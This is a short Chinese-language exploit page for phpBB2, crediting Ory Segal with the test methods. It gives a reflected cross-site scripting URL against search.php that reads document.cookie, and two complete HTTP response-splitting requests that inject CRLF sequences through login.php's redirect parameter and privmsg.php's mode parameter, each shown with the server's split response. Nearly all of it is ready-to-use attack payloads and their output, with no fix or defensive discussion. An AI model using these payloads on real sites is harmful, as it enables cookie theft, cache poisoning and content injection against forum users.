phpBBHTTP应答分割攻击及跨站脚本执行漏洞 Exploit

Ory Segal （ORY.SEGAL@SANCTUMINC.COM）提供了如下测试方法： 跨站脚本攻击： http://SERVER/phpBB2/search.php?search_author='<script>alert(document.cookie)</script> HTTP应答分割 [REQUEST] POST /phpBB2/login.php HTTP/1.0 Host: SERVER User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-Type: application/x-www-form-urlencoded Content-length: 129 logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! [RESPONSE] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 09:48:04 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 09:48:04 GMT; path=/ Set-Cookie: phpbb2mysql_sid=b389d63f8226cc6c8ad349b3aadf41f3; path=/ Refresh: 0; URL=http://SERVER/phpBB2foobar Content-Length: 0 HTTP/1.0 200 OK Content-Length: 7 Gotcha! ... ... ... -[ HTTP Response Splitting Example [2] [REQUEST] GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d %0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! HTTP/1.0 Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.7 [en] (WinNT; I) Host: SERVER [RESPONSE] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 12:42:17 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 12:42:17 GMT; path=/ Set-Cookie: phpbb2mysql_sid=74d20cacbfcd9d7b16e0bb86a345aea3; path=/ Refresh: 0; URL=http://SERVER/phpBB2login.php?redirect=privmsg .php&folder=inbox&mode=foobar Content-Length: 0 HTTP/1.0 200 OK Content-Length: 7 Gotcha!&sid=74d20cacbfcd9d7b16e0bb86a345aea3 ... ... ...